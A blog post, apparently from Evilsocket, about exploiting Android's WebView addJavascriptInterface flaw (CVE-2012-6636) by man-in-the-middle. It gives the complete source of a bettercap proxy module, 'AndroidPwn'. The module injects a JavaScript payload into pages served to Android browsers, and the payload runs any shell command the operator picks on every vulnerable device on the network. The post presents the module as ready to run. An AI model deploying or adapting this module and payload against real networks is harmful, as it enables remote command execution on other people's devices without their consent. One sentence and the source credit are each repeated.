Recently I've been playing with Android's WebView based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting ones is the addJavascriptInterface vulnerability ( CVE-2012-6636 ) which affects every device running a version older than Android 4.2.
One of the most interesting ones is the addJavascriptInterface vulnerability ( CVE-2012-6636 ) which affects every device running a version older than Android 4.2.
There's an excellent post about this vulnerability, long story short, if there's an app which is using aWebView UI control and it's declaring a custom javascript interface for it like so:
public class WebViewGUI extends Activity {
WebView mWebView;
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
mWebView=new WebView(this);
mWebView.getSettings().setJavaScriptEnabled(true);
mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
mWebView.loadUrl("file:///android_asset/www/index.html");
setContentView(mWebView);
}
final class JavaScriptInterface {
JavaScriptInterface () { }
public String getSomeString() {
return "string";
}
}
}
you can inject some special javascript into that page and make that device execute any shell command you want.
In this post, I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap and for this purpose I've wrote the AndroidPwn transparent proxy module.
class AndroidPwn < BetterCap::Proxy::Module
@@command = nil
@@payload = "<script>\n" +
"var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
"for(i in top) {\n" +
" try {\n" +
" top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
" break;\n" +
" }\n" +
"catch(e) {}\n" +
"}\n" +
"</script>"
def self.on_options(opts)
opts.separator ""
opts.separator "AndroidPwn Proxy Module Options:"
opts.separator ""
opts.on( '--command STRING', 'Shell command(s) to execute.' ) do |v|
@@command = v.strip
@@payload['COMMAND_HERE'] = @@command.gsub( "'", "\\\\'" )
end
end
def initialize
raise BetterCap::Error, "No --command option specified for the proxy module." if @@command.nil?
end
def on_request( request, response )
if is_exploitable?( request, response )
BetterCap::Logger.info ""
BetterCap::Logger.info "Pwning Android Device :".red
BetterCap::Logger.info " URL : http://#{request.host}#{request.url}"
BetterCap::Logger.info " AGENT : #{request.headers['User-Agent']}"
BetterCap::Logger.info ""
response.body.sub!( '</head>', "</head>#{@@payload}" )
end
end
private
def is_exploitable?(req,res)
req.headers.has_key?('User-Agent') and \
req.headers['User-Agent'].include?("Android") and \
req.headers['User-Agent'].include?("AppleWebKit") and \
res.content_type =~ /^text\/html.*/ and \
res.code == '200'
end
end
As you can see, you just need to activate it and specify a
--command COMMAND command line argument and you're ready to go.
Leave it running and it will automatically perform a Man-In-The-Middle attack on your network and execute the command(s) you've chosen on every single Android device it will find on the network.
Source:Evilsocket
Source:Evilsocket
